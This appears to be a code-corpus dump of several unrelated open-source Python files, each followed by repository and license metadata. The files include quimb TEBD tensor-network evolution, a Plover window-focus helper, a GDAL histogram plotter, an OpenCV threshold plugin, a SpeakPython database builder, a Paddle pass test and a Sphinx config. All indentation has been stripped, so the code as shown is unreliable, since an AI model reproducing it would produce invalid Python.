See Also
--------
quimb.Evolution
"""
def __init__(self, p0, H, dt=None, tol=None, t0=0.0,
split_opts=None, progbar=True):
# prepare initial state
self._pt = p0.copy()
self._pt.canonize(0)
self.N = self._pt.nsites
# handle hamiltonian -> convert array to NNI
if isinstance(H, np.ndarray):
H = NNI(H, cyclic=p0.cyclic)
if not isinstance(H, NNI):
raise TypeError("``H`` should be a ``NNI`` or 2-site array, "
"not a TensorNetwork of any form.")
if p0.cyclic != H.cyclic:
raise ValueError("Both ``p0`` and ``H`` should have matching OBC "
"or PBC.")
self.H = H
self.cyclic = H.cyclic
self._ham_norm = H.mean_norm()
self._U_ints = {}
self._err = 0.0
# set time and tolerance defaults
self.t0 = self.t = t0
if dt and tol:
raise ValueError("Can't set default for both ``dt`` and ``tol``.")
self.dt = self._dt = dt
self.tol = tol
# misc other options
self.progbar = progbar
self.split_opts = {} if split_opts is None else dict(split_opts)
@property
def pt(self):
"""The MPS state of the system at the current time.
"""
return self._pt.copy()
@property
def err(self):
return self._err
def choose_time_step(self, tol, T, order):
"""Trotter error is ``~ (T / dt) * dt^(order + 1)``. Invert to
find desired time step, and scale by norm of interaction term.
"""
return (tol / (T * self._ham_norm)) ** (1 / order)
def get_gate(self, dt_frac, sites=None):
"""Get the unitary (exponentiated) gate for fraction of timestep
``dt_frac`` and sites ``sites``, cached.
"""
if sites not in self.H.special_sites:
sites = None
try:
return self._U_ints[dt_frac, sites]
except KeyError:
U = qu.expm(-1.0j * self._dt * dt_frac * self.H(sites))
self._U_ints[dt_frac, sites] = U
return U
def sweep(self, direction, dt_frac, dt=None, queue=False):
"""Perform a single sweep of gates and compression. This shifts the
        orthogonality centre along with the gates as they are applied and
split.
Parameters
----------
direction : {'right', 'left'}
Which direction to sweep. Right is even bonds, left is odd.
dt_frac : float
What fraction of dt substep to take.
dt : float, optional
            Override the current ``dt`` with a custom value.
"""
# if custom dt set, scale the dt fraction
if dt is not None:
dt_frac *= (dt / self._dt)
# ------ automatically combine consecutive sweeps of same time ------ #
if not hasattr(self, '_queued_sweep'):
self._queued_sweep = None
if queue:
# check for queued sweep
if self._queued_sweep:
# if matches, combine and continue
if direction == self._queued_sweep[0]:
self._queued_sweep[1] += dt_frac
return
# else perform the old, queue the new
else:
new_queued_sweep = [direction, dt_frac]
direction, dt_frac = self._queued_sweep
self._queued_sweep = new_queued_sweep
# just queue the new sweep
else:
self._queued_sweep = [direction, dt_frac]
return
# check if need to drain the queue first
elif self._queued_sweep:
queued_direction, queued_dt_frac = self._queued_sweep
self._queued_sweep = None
self.sweep(queued_direction, queued_dt_frac, queue=False)
# ------------------------------------------------------------------- #
if direction == 'right':
# Apply even gates:
#
# o-<-<-<-<-<-<-<-<-<- -<-<
# | | | | | | | | | | | | >~>~>~>~>~>~>~>~>~>~>~o
# UUU UUU UUU UUU UUU ... UUU --> | | | | | | | | | | | |
# | | | | | | | | | | | |
# 1 2 3 4 5 ==>
#
for i in range(0, self.N - 1, 2):
sites = (i, i + 1)
U = self.get_gate(dt_frac, sites)
self._pt.left_canonize(start=max(0, i - 1), stop=i)
self._pt.gate_split_(
U, where=sites, absorb='right', **self.split_opts)
elif direction == 'left':
# Apply odd gates:
#
# >->->- ->->->->->->->->-o
# | | | | | | | | | | | | o~<~<~<~<~<~<~<~<~<~<~<
# | UUU ... UUU UUU UUU UUU | --> | | | | | | | | | | | |
# | | | | | | | | | | | |
# <== 4 3 2 1
#
for i in reversed(range(1, self.N - (0 if self.cyclic else 1), 2)):
sites = (i, i + 1)
U = self.get_gate(dt_frac, sites)
self._pt.right_canonize(
start=min(self.N - 1, i + 2), stop=i + 1)
self._pt.gate_split_(
U, where=sites, absorb='left', **self.split_opts)
# one extra canonicalization not included in last split
self._pt.right_canonize_site(1)
def _step_order2(self, tau=1, **sweep_opts):
"""Perform a single, second order step.
"""
self.sweep('right', tau / 2, **sweep_opts)
self.sweep('left', tau, **sweep_opts)
self.sweep('right', tau / 2, **sweep_opts)
def _step_order4(self, **sweep_opts):
"""Perform a single, fourth order step.
"""
tau1 = tau2 = 1 / (4 * 4**(1 / 3))
tau3 = 1 - 2 * tau1 - 2 * tau2
self._step_order2(tau1, **sweep_opts)
self._step_order2(tau2, **sweep_opts)
self._step_order2(tau3, **sweep_opts)
self._step_order2(tau2, **sweep_opts)
self._step_order2(tau1, **sweep_opts)
def step(self, order=2, dt=None, progbar=None, **sweep_opts):
"""Perform a single step of time ``self.dt``.
"""
{2: self._step_order2,
4: self._step_order4}[order](dt=dt, **sweep_opts)
dt = self._dt if dt is None else dt
self.t += dt
self._err += self._ham_norm * dt ** (order + 1)
if progbar is not None:
progbar.cupdate(self.t)
self._set_progbar_desc(progbar)
def _compute_sweep_dt_tol(self, T, dt, tol, order):
# Work out timestep, possibly from target tol, and checking defaults
dt = self.dt if (dt is None) else dt
tol = self.tol if (tol is None) else tol
if not (dt or tol):
raise ValueError("Must set one of ``dt`` and ``tol``.")
if (dt and tol):
raise ValueError("Can't set both ``dt`` and ``tol``.")
if dt is None:
self._dt = self.choose_time_step(tol, T - self.t, order)
else:
self._dt = dt
return self._dt
TARGET_TOL = 1e-13 # tolerance to have 'reached' target time
def update_to(self, T, dt=None, tol=None, order=4, progbar=None):
"""Update the state to time ``T``.
Parameters
----------
T : float
The time to evolve to.
dt : float, optional
Time step to use. Can't be set as well as ``tol``.
tol : float, optional
Tolerance for whole evolution. Can't be set as well as ``dt``.
order : int, optional
Trotter order to use.
progbar : bool, optional
Manually turn the progress bar off.
"""
if T < self.t - self.TARGET_TOL:
raise NotImplementedError
self._compute_sweep_dt_tol(T, dt, tol, order)
# set up progress bar and start evolution
progbar = self.progbar if (progbar is None) else progbar
progbar = qu.utils.continuous_progbar(self.t, T) if progbar else None
while self.t < T - self.TARGET_TOL:
if (T - self.t < self._dt):
# set custom dt if within one step of final time
dt = T - self.t
# also make sure queued sweeps are drained
queue = False
else:
dt = None
queue = True
# perform a step!
self.step(order=order, progbar=progbar, dt=dt, queue=queue)
if progbar:
progbar.close()
def _set_progbar_desc(self, progbar):
msg = f"t={self.t:.4g}, max-bond={self._pt.max_bond()}"
progbar.set_description(msg)
def at_times(self, ts, dt=None, tol=None, order=4, progbar=None):
"""Generate the time evolved state at each time in ``ts``.
Parameters
----------
ts : sequence of float
The times to evolve to and yield the state at.
dt : float, optional
Time step to use. Can't be set as well as ``tol``.
tol : float, optional
Tolerance for whole evolution. Can't be set as well as ``dt``.
order : int, optional
Trotter order to use.
progbar : bool, optional
Manually turn the progress bar off.
Yields
------
pt : MatrixProductState
The state at each of the times in ``ts``. This is a copy of
internal state used, so inplace changes can be made to it.
"""
        # convert ts to list, to calc range and use progress bar
ts = sorted(ts)
T = ts[-1]
# need to use dt always so tol applies over whole T sweep
dt = self._compute_sweep_dt_tol(T, dt, tol, order)
# set up progress bar
progbar = self.progbar if (progbar is None) else progbar
if progbar:
ts = qu.utils.progbar(ts)
for t in ts:
self.update_to(t, dt=dt, tol=False, order=order, progbar=False)
if progbar:
self._set_progbar_desc(ts)
yield self.pt
def OTOC_local(psi0, H, H_back, ts, i, A, j=None, B=None,
initial_eigenstate='check', **tebd_opts):
""" The out-of-time-ordered correlator (OTOC) generating by two local
operator A and B acting on site 'i', note it's a function of time.
Parameters
----------
psi0 : MatrixProductState
The initial state in MPS form.
H : NNI
The Hamiltonian for forward time-evolution.
H_back : NNI
        The Hamiltonian for backward time-evolution; it should differ from
        'H' only in sign.
ts : sequence of float
The time to evolve to.
i : int
The site where the local operators acting on.
A : array
The operator to act with.
    initial_eigenstate: {'check', False, True}
        Whether psi0 is an eigenstate of operator B. With 'check', this is
        tested automatically; if psi0 is an eigenstate of B, a simpler
        version of the OTOC calculation is run.
Returns
----------
The OTOC <A(t)B(0)A(t)B(0)>
"""
if B is None:
B = A
if j is None:
j = i
if initial_eigenstate == 'check':
psi = psi0.gate(B, j, contract=True)
x = psi0.H.expec(psi)
y = psi.H.expec(psi)
if abs(x**2 - y) < 1e-10:
initial_eigenstate = True
else:
initial_eigenstate = False
if initial_eigenstate is True:
tebd1 = TEBD(psi0, H, **tebd_opts)
x = psi0.H.expec(psi0.gate(B, j, contract=True))
for t in ts:
# evolve forward
tebd1.update_to(t)
# apply first A-gate
psi_t_A = tebd1.pt.gate(A, i, contract=True)
# evolve backwards
tebd2 = TEBD(psi_t_A, H_back, **tebd_opts)
tebd2.update_to(t)
# compute expectation with second B-gate
psi_f = tebd2.pt
yield x * psi_f.H.expec(psi_f.gate(B, j, contract=True))
else:
        # set up the initial TEBDs and apply the first operator B to the right state
psi0_L = psi0
tebd1_L = TEBD(psi0_L, H, **tebd_opts)
psi0_R = psi0.gate(B, j, contract=True)
tebd1_R = TEBD(psi0_R, H, **tebd_opts)
for t in ts:
# evolve forward
tebd1_L.update_to(t)
tebd1_R.update_to(t)
            # apply the operator A to both left and right states
psi_t_L_A = tebd1_L.pt.gate(A, i, contract=True)
psi_t_R_A = tebd1_R.pt.gate(A.H, i, contract=True)
# set the second left and right TEBD
tebd2_L = TEBD(psi_t_L_A, H_back, **tebd_opts)
tebd2_R = TEBD(psi_t_R_A, H_back, **tebd_opts)
# evolve backwards
tebd2_L.update_to(t)
tebd2_R.update_to(t)
            # apply the last operator B to the left state and compute the overlap
psi_f_L = tebd2_L.pt.gate(B.H, j, contract=True)
psi_f_R = tebd2_R.pt
yield psi_f_L.H.expec(psi_f_R)
|
jcmgray/quijy
|
quimb/tensor/tensor_tebd.py
|
Python
|
mit
| 20,340 | 0 |
import sys
if sys.platform.startswith('win32'):
import win32gui
GetForegroundWindow = win32gui.GetForegroundWindow
SetForegroundWindow = win32gui.SetForegroundWindow
elif sys.platform.startswith('darwin'):
from Foundation import NSAppleScript
def GetForegroundWindow():
return NSAppleScript.alloc().initWithSource_("""
tell application "System Events"
return unix id of first process whose frontmost = true
end tell""").executeAndReturnError_(None)[0].int32Value()
def SetForegroundWindow(pid):
NSAppleScript.alloc().initWithSource_("""
tell application "System Events"
set the frontmost of first process whose unix id is %d to true
end tell""" % pid).executeAndReturnError_(None)
elif sys.platform.startswith('linux'):
from subprocess import call, check_output, CalledProcessError
def GetForegroundWindow():
try:
output = check_output(['xprop', '-root', '_NET_ACTIVE_WINDOW'])
return int(output.split()[-1], 16)
except CalledProcessError:
return None
def SetForegroundWindow(w):
"""Returns focus to previous application."""
try:
call(['wmctrl', '-i', '-a', str(w)])
except CalledProcessError:
pass
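# Illustrative usage (the handle type is platform specific: an HWND on Windows,
# a unix process id on macOS, an X window id on Linux):
#
#   previous = GetForegroundWindow()
#   # ... focus moves to another window ...
#   SetForegroundWindow(previous)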
|
Germanika/plover
|
plover/oslayer/wmctrl.py
|
Python
|
gpl-2.0
| 1,274 | 0 |
#!/usr/bin/env python
#/******************************************************************************
# * $Id$
# *
# * Project:  GDAL Make Histogram and Cumulative graph from tab-delimited table as
# generated by gdal_hist.py
# * Purpose: Take a gdal_hist.py output and create a histogram plot using matplotlib
# * Author: Trent Hare, thare@usgs.gov
# *
# ******************************************************************************
# * Public domain license (unlicense)
# *
# * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# * DEALINGS IN THE SOFTWARE.
# ****************************************************************************/
import sys
import os
import math
import numpy as np
import pandas as pd
from pandas.tools.plotting import table
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def usage():
print 'Usage: slope_histogram_cumulative_graph.py -name "InSight E1" slope_histogram_table.tab outfile.png'
print " This program is geared to run on a table as generated by gdal_hist.py"
print 'slope_histogram_cumulative_graph.py -name "E_Marg_CE 01" DEM_1m_E_Marg_CE_adir_1m_hist.xls DEM_1m_E_Marg_CE_adir_1m_hist.png'
sys.exit(0)
#set None for commandline options
name = ""
infile = None
outfile = None
# =============================================================================
# Parse command line arguments.
# =============================================================================
i = 1
while i < len(sys.argv):
arg = sys.argv[i]
if arg == '-name':
i = i + 1
name = sys.argv[i]
elif infile is None:
infile = arg
elif outfile is None:
outfile = arg
else:
        usage()
i = i + 1
if infile is None:
usage()
if not(os.path.isfile(infile)):
    print "filename %s does not exist." % (infile)
sys.exit(1)
#load table
df = pd.DataFrame.from_csv(infile, sep='\t', header=1)
#initialize figure
fig, ax1 = plt.subplots()
#calculate unscaled values
#df.value = (df.value * 5) - 0.2
#df.ix[df.value < 0] = 0; df
#not to reverse histogram before calculating 'approx' stats
#min = round(df.value.min(),2)
#max = round(df.value.max(),2)
#mean = round(df.value.mean(),2)
#stddev = round(df.value.std(),2)
#rms = round(math.sqrt((mean * mean) + (stddev * stddev)),2)
#statsDict = {'Min':min,'Max':max,'Mean':mean \
#,'StdDev':stddev,'RMS':rms}
#statsSeries = pd.Series(statsDict,name='stats')
#statsSeries.sort()
#t = table(ax1, statsSeries, \
#loc='lower right', colWidths=[0.1] * 2)
#t.set_fontsize(18)
#props = t.properties()
#cells = props['child_artists']
#for c in cells:
#c.set_height(0.05)
#Plot frequency histogram from input table
ax1.fill(df.value,df['count'],'gray')
#df.plot(ax1=ax1, kind='area', color='gray', legend=True)
ax1.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
ax1.get_yaxis().set_tick_params(direction='out')
#get min and max as found by pandas for plotting 'arrow' at X=15
#minY = round(df['count'].min(),0)
#maxY = round(df['count'].max(),0)
#grab existing ax1 axes
#ax = plt.axes()
#ax.arrow(15, minY, 0, maxY, head_width=0, head_length=0, fc='k', ec='k')
ax1.axvline(x=15, color='black', alpha=0.5)
#add cumulative plot on 'Y2' axis using save X axes
ax2 = ax1.twinx()
ax2.plot(df.value,df['cumulative'],'blue')
#df.plot(ax2=ax2, df.value,df['cumulative'],'blue')
ax2.get_yaxis().set_tick_params(direction='out')
#define labels
ax1.set_xlabel('Slope (degrees)')
ax1.set_ylabel('Count')
ax2.set_ylabel('Cumulative')
plt.suptitle(name + ' Slope Histogram and Cumulative Plot')
#save out PNG
plt.savefig(outfile)
print "Graph exported to %s" % (outfile)
|
USGS-Astrogeology/GDAL_scripts
|
gdal_baseline_slope/python2/slope_histogram_cumulative_graph.py
|
Python
|
unlicense
| 4,103 | 0.013892 |
# -*- coding: utf-8 -*-
'''
Pupil Player Third Party Plugins by cpicanco
Copyright (C) 2016 Rafael Picanço.
The present file is distributed under the terms of the GNU General Public License (GPL v3.0).
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import cv2
from pyglui import ui
from plugin import Plugin
blue, green, red = 0, 1, 2
class Filter_Opencv_Threshold(Plugin):
"""
    Apply cv2.threshold to each channel of the (world) frame.img
"""
uniqueness = "not_unique"
def __init__(self, g_pool, threshold=177, thresh_mode="BINARY", otsu=False):
super(Filter_Opencv_Threshold, self).__init__(g_pool)
# run before all plugins
# self.order = .1
# run after all plugins
self.order = .99
# initialize empty menu
self.menu = None
# filter properties
self.threshold = threshold
self.thresh_mode = thresh_mode
self.otsu = otsu
def update(self,frame,events):
# thresh_mode
if self.thresh_mode == "NONE":
return
if self.thresh_mode == "BINARY":
cv2_thresh_mode = cv2.THRESH_BINARY
if self.thresh_mode == "BINARY_INV":
cv2_thresh_mode = cv2.THRESH_BINARY_INV
if self.thresh_mode == "TRUNC":
cv2_thresh_mode = cv2.THRESH_TRUNC
if self.thresh_mode == "TOZERO":
cv2_thresh_mode = cv2.THRESH_TOZERO
if self.otsu:
cv2_thresh_mode = cv2_thresh_mode + cv2.THRESH_OTSU
# apply the threshold to each channel
for i, channel in enumerate((frame.img[:,:,blue], frame.img[:,:,green], frame.img[:,:,red])):
retval, edg = cv2.threshold(channel, self.threshold, 255, cv2_thresh_mode)
frame.img[:,:,i] = edg
def init_gui(self):
# initialize the menu
self.menu = ui.Scrolling_Menu('Threshold')
# add menu to the window
self.g_pool.gui.append(self.menu)
# append elements to the menu
self.menu.append(ui.Button('remove',self.unset_alive))
self.menu.append(ui.Info_Text('Filter Properties'))
self.menu.append(ui.Selector('thresh_mode',self,label='Thresh Mode',selection=["NONE","BINARY","BINARY_INV", "TRUNC","TOZERO"] ))
self.menu.append(ui.Switch('otsu',self,label='Otsu'))
self.menu.append(ui.Slider('threshold',self,min=0,step=1,max=255,label='Threshold'))
def deinit_gui(self):
if self.menu:
self.g_pool.gui.remove(self.menu)
self.menu = None
def unset_alive(self):
self.alive = False
def get_init_dict(self):
# persistent properties throughout sessions
return {'threshold':self.threshold, 'thresh_mode':self.thresh_mode, 'otsu':self.otsu}
def cleanup(self):
""" called when the plugin gets terminated.
This happens either voluntarily or forced.
if you have a GUI or glfw window destroy it here.
"""
self.deinit_gui()
|
cpicanco/player_plugins
|
filter_opencv_threshold.py
|
Python
|
gpl-3.0
| 3,093 | 0.012937 |
import antlr3;
import sqlite3;
import pickle;
import sys, os;
import re;
from SpeakPython.SpeakPython import SpeakPython;
from SpeakPython.SpeakPythonLexer import SpeakPythonLexer;
from SpeakPython.SpeakPythonParser import SpeakPythonParser;
#sort results based on length of labels
def sortResults(results):
l = len(results);
if l == 1 or l == 0:
return results;
s1 = sortResults(results[:l/2]);
s2 = sortResults(results[l/2:]);
res = [];
si1 = 0;
si2 = 0;
sl1 = len(s1);
sl2 = len(s2);
max = sl1 + sl2;
for i in range(0, max):
if si1 == sl1:
res.extend(s2[si2:]);
break;
if si2 == sl2:
res.extend(s1[si1:]);
break;
if len(s1[si1].labels) > len(s2[si2].labels):
res.append( s1[si1] );
si1 += 1;
else:
res.append( s2[si2] );
si2 += 1;
return res;
def makeDB(conn):
c = conn.cursor();
try:
c.execute("DROP TABLE matches");
c.execute("DROP TABLE functions");
c.execute("DROP TABLE kleene")
conn.commit();
except Exception as e:
conn.rollback();
c.execute("CREATE TABLE matches (order_id INTEGER PRIMARY KEY, keywords TEXT, regex TEXT, results BLOB)");
c.execute("CREATE TABLE functions (name TEXT, regex TEXT, results BLOB)");
c.execute("CREATE TABLE kleene (id TEXT PRIMARY KEY, regexes BLOB)");
#index the keywords to speed up text search
c.execute("CREATE INDEX IF NOT EXISTS keyword_idx ON matches (keywords)");
c.execute("CREATE INDEX IF NOT EXISTS func_name_idx ON functions (name)");
conn.commit();
def performTestCases(exp, testCases):
print "Testing: ", exp
for t in testCases:
m = re.match(exp, t);
if m == None:
print "Test case failed: ", t;
return False;
return True;
def insertIntoDB(conn, matches, functions):
matchEntries = [];
kleeneEntries = [];
funcEntries = [];
print "Running test cases for matches...";
idCount = 0;
for m in matches:
#perform in-suite test cases
succeededTests = performTestCases(m.exp, m.testCases);
if not succeededTests:
return;
k = ','.join(m.keywords);
m.results = sortResults(m.results);
if len(m.kGroupRegexes) > 0:
kleeneEntries.append((str(idCount), pickle.dumps(m.kGroupRegexes)));
matchEntries.append((idCount, k, m.exp, pickle.dumps(m.results)));
idCount += 1;
print "All match test cases passed.";
c = conn.cursor();
c.executemany("INSERT INTO matches VALUES (?,?,?,?)", matchEntries);
conn.commit();
print "Running test cases for functions...";
for f in functions:
f = functions[f];
#perform in-suite test cases
		succeededTests = performTestCases(f.getExp(), f.testCases);
if not succeededTests:
return;
#save all regex groups in database under function name
if len(f.kGroupRegexes) > 0:
kleeneEntries.append((f.getName(), pickle.dumps(f.kGroupRegexes)));
f.results = sortResults(f.results);
funcEntries.append((f.getName(), f.getExp(), pickle.dumps(f.getResults())));
print "All function test cases passed";
c.executemany("INSERT INTO functions VALUES (?,?,?)", funcEntries);
c.executemany("INSERT INTO kleene VALUES (?,?)", kleeneEntries);
conn.commit();
print "Functions:";
for row in c.execute("SELECT * FROM functions"):
print row, '\n';
print "\n";
print "Matches:";
for row in c.execute("SELECT * FROM matches"):
print row, '\n';
print "\n";
print "Kleene:";
for row in c.execute("SELECT * FROM kleene"):
print row, '\n';
print "\n";
conn.close();
def parse(conn, fileList, dirName):
parser = None;
otherGlobalTests = {};
for f in fileList:
#join filename with current directory path
fileName = os.path.join(dirName, f);
#if f is a file, parse and insert into db
if os.path.isfile(fileName):
char_stream = antlr3.ANTLRFileStream(fileName);
lexer = SpeakPythonLexer(char_stream);
tokens = antlr3.CommonTokenStream(lexer);
# for t in lexer:
# print t;
parser = SpeakPythonParser(tokens);
parser.prog();
insertIntoDB(conn, parser.matches, parser.aliases);
#if f is a dir, pass list of files into recursive call
if os.path.isdir(fileName):
subFiles = os.listdir(fileName);
otherGlobalTests = parse(conn, subFiles, fileName);
globalTests = {};
if parser == None:
print "Parser not defined."
else:
globalTests = parser.globalTests;
globalTests.update(otherGlobalTests);
return globalTests;
def main(argv):
name = argv[1] + '.db';
conn = sqlite3.connect(name);
makeDB(conn);
globalTests = parse(conn, [argv[2]], '');
for gt in globalTests:
sp = SpeakPython(name);
r = sp.matchResult(gt);
resultStr = '';
if r != None:
resultStr = r.getResult();
if resultStr != globalTests[gt]:
print "Value test case failed: (" + gt + ") does not return (" + globalTests[gt] + "), but instead returns (" + resultStr + ")";
main(sys.argv);
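# Invocation implied by main() above:
#   python SpeakPythonMakeDB.py <db-name-without-extension> <grammar-file-or-directory>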
|
netgio/voicecount
|
devicecode/SpeakPythonMakeDB.py
|
Python
|
mit
| 4,765 | 0.057712 |
from distutils.core import setup
version = '1.1.1'
setup(name='CacheGenerator',
version=version,
description="CacheGenerator for Django",
author="Ricardo Santos",
author_email="ricardo@getgears.com",
url="http://github.com/ricardovice/CacheGenerator/",
packages = ['cachegenerator']
)
|
ricardovice/CacheGenerator
|
setup.py
|
Python
|
mit
| 329 | 0.006079 |
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.distributed.fleet as fleet
import numpy as np
import paddle.nn as nn
from paddle.distributed.passes import new_pass, PassManager
import unittest
from dist_pass_test_base import DistPassTestBase
class BatchNormAddActNet(nn.Layer):
def __init__(self):
super(BatchNormAddActNet, self).__init__()
self.conv1 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC")
self.conv2 = nn.Conv2D(3, 8, (3, 3), data_format="NHWC")
self.bn1 = nn.BatchNorm2D(8, data_format="NHWC")
self.bn2 = nn.BatchNorm2D(8, data_format="NHWC")
self.relu = nn.ReLU()
def forward(self, x):
y = self.conv1(x)
y = self.bn1(y)
out = self.conv2(x)
out = self.bn2(out) + y
out = self.relu(out)
out = paddle.flatten(out, 1)
return out
class TestFuseBatchNormAddActPass(DistPassTestBase):
def init(self):
self.atol = 1e-4
self.rtol = 1e-4
def get_model(self, place, batch_size=32, image_shape=[224, 224, 3]):
image = paddle.static.data(
shape=[batch_size] + image_shape, dtype='float32', name='image')
model = BatchNormAddActNet()
pred_out = model(image)
loss = paddle.mean(pred_out)
optimizer = paddle.optimizer.Adam(learning_rate=1e-3)
dist_strategy = fleet.DistributedStrategy()
dist_strategy.fuse_all_reduce_ops = False
dist_strategy.without_graph_optimization = True
dist_strategy.amp = True
dist_strategy.amp_configs = {
"init_loss_scaling": 32768,
"use_dynamic_loss_scaling": True,
}
fleet.init(is_collective=True, strategy=dist_strategy)
optimizer = fleet.distributed_optimizer(optimizer)
optimizer.minimize(loss)
rank = paddle.distributed.get_rank()
def reader():
seed = int(os.environ.get("SEED", 0))
np.random.seed(seed + rank)
for _ in range(10):
image_np = np.random.random(size=image.shape).astype('float32')
yield image_np,
main_program = paddle.static.default_main_program()
startup_program = paddle.static.default_startup_program()
return main_program, startup_program, [image], [loss], reader
def apply_passes(self, main_prog, startup_prog):
pass_manager = PassManager([new_pass("fuse_bn_add_act")])
pass_manager.apply([main_prog], [startup_prog])
print(pass_manager.names)
op_type = []
for op in main_prog.global_block().ops:
op_type.append(op.type)
self.assertTrue("fused_bn_add_activation" in op_type)
self.assertTrue("fused_bn_add_activation_grad" in op_type)
def test_fuse_bn_add_act(self):
self.check_main()
if __name__ == "__main__":
unittest.main()
|
luotao1/Paddle
|
python/paddle/fluid/tests/unittests/distributed_passes/test_dist_fuse_bn_add_act_pass.py
|
Python
|
apache-2.0
| 3,476 | 0.000863 |
from django.conf.urls import patterns, include, url
from django.conf import settings
# Note: importing via contacts.profile here would cause a name clash, since contacts is itself a module
from profile import ProfileView
from contacts import ContactsView
from authen import Authenticate
strid = settings.CONTACT_URL['strid']
user = settings.CONTACT_URL['user']
contact = settings.CONTACT_URL['contact']
auth = settings.CONTACT_URL['auth']
urlpatterns = patterns('',
url(r'^api/'+auth+'$', Authenticate.as_view()),
url(r'^api/(?P<'+strid+r'>\w{16})/$', ProfileView.as_view()),
url(r'^api/(?P<'+strid+r'>\w{16})/(?P<'+contact+r'>\d+)/$', ContactsView.as_view()),
url(r'^(?P<'+user+r'>\w{5,18})/(?P<'+strid+r'>\w{16})/$', ProfileView.as_view()),
url(r'^(?P<'+user+r'>\w{5,18})/(?P<'+strid+r'>\w{16})/(?P<'+contact+r'>\d+)/$', ContactsView.as_view()),
)
|
sharehub/DBRest
|
dbrest/contacts/urls.py
|
Python
|
mit
| 858 | 0.005828 |
import sys
from django.core.management.base import BaseCommand, CommandError
import nflgame
from terminaltables import AsciiTable
from ...models import Player, Team, Season, Week, WeeklyStats
class Command(BaseCommand):
help = 'takes option position, displays top players as table'
def add_arguments(self, parser):
# Named (optional) arguments
parser.add_argument('position', nargs=1)
def handle(self, *args, **options):
p = options['position']
if p:
Player.show_top_players(position=p[0])
else:
Player.show_top_players()
|
johnshiver/football_tools
|
football/core/management/commands/show_top_players.py
|
Python
|
mit
| 607 | 0.001647 |
# -*- coding: utf-8 -*-
# Copyright (c) 2010 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Keystone documentation build configuration file, created by
# sphinx-quickstart on Tue May 18 13:50:15 2010.
#
# This file is execfile()'d with the current directory set to its containing
# dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.abspath(os.path.join(BASE_DIR, "..", ".."))
sys.path.insert(0, ROOT_DIR)
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.ifconfig',
'sphinx.ext.graphviz',
'sphinx.ext.todo',
'oslo_config.sphinxext',
'oslo_config.sphinxconfiggen',
'oslo_policy.sphinxext',
'oslo_policy.sphinxpolicygen',
'openstackdocstheme',]
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = []
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master doctree document.
master_doc = 'index'
# General information about the project.
project = u'Neutron VPNaaS'
copyright = u'2011-present, OpenStack Foundation.'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
# unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'native'
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = ['neutron_vpnaas.']
# -- Options for man page output --------------------------------------------
# Grouping the document tree for man pages.
# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
#man_pages = [
# ('man/neutron-server', 'neutron-server', u'Neutron Server',
# [u'OpenStack'], 1)
#]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
html_theme = 'openstackdocs'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
